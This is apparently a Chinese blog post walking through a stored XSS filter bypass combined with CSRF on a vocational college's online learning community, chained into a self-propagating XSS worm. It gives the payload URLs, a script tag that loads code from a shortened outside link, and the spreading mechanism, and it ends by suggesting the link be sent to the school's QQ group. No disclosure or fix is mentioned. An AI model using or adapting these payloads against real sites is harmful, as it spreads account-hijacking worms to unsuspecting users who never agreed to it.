【漏洞案例】储存XSS+CSRF(XSS绕过滤到蠕虫攻击)

不知道更新什么了,给大家分享个漏洞案例吧,今天上午终于把电脑修好了,啊哈哈哈~


某职业技术学院储存XSS+CSRF(XSS绕过滤到蠕虫攻击)

注册处:http://xxx.edu.cn/meol/xxxx 需要注册才能进入社区发表嘛

先说下储存XSS,过滤了,发现可绕过

储存XSS:http://xxx.edu.cn/meol/xxx?genre=80&type=0

他是先过滤再输出,而不是输出时过滤,从而导致可绕过

我们发现他输入时就进行了过滤,直接替换<script>alert('XSS')</script>

成功弹框:

再说一下CSRF,同样是这个位置,发表话题

改成get请求

得到连接:
CSRF:http://xxx.edu.cn/meol/xxx?type=&studyCircleId=&saytext=%B9%FE%B9%FE 点击链接会自动发表内容(内容为哈哈)

我们缩短一下链接 缩短链接(http://suo.im/xxx)

http://xxx.edu.cn/meol/xxx?userId=23620&genre=80&type=0 个人中心(别人可以查看你的个人中心,不然怎么蠕虫攻击呢?)

构造一下csrf连接:<script src=http://suo.im/xxx></script> (插入到网页当中,当别人访问你的个人中心,会自动发表一个内容)

接着我们继续构造,找到CSRF漏洞处,把后面的内容替换掉,也就是访问此连接会自动发表内容

http://xxx.edu.cn/meol/xxx?type=0&studyCircleId=&saytext=<script src=http://suo.im/xxx></script>

我们继续缩短网址:

缩短后:http://suo.im/XXXX

这个时候我们再调用一下CSRF+XSS的地址:<script src=http://suo.im/XXXX></script>

把这个链接插入到网页当中即可完成XSS蠕虫攻击

http://xxx.edu.cn/meol/xxx?userId=23620&genre=80&type=0 完成攻击

当A访问你的主页时,A会发表和你一样的内容,当B访问A的主页时,B会发表和A一样的内容,同理,完成XSS蠕虫攻击


其他利用:可以自己构造个网站,加这个学校的Q群,发送链接 hhh

分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)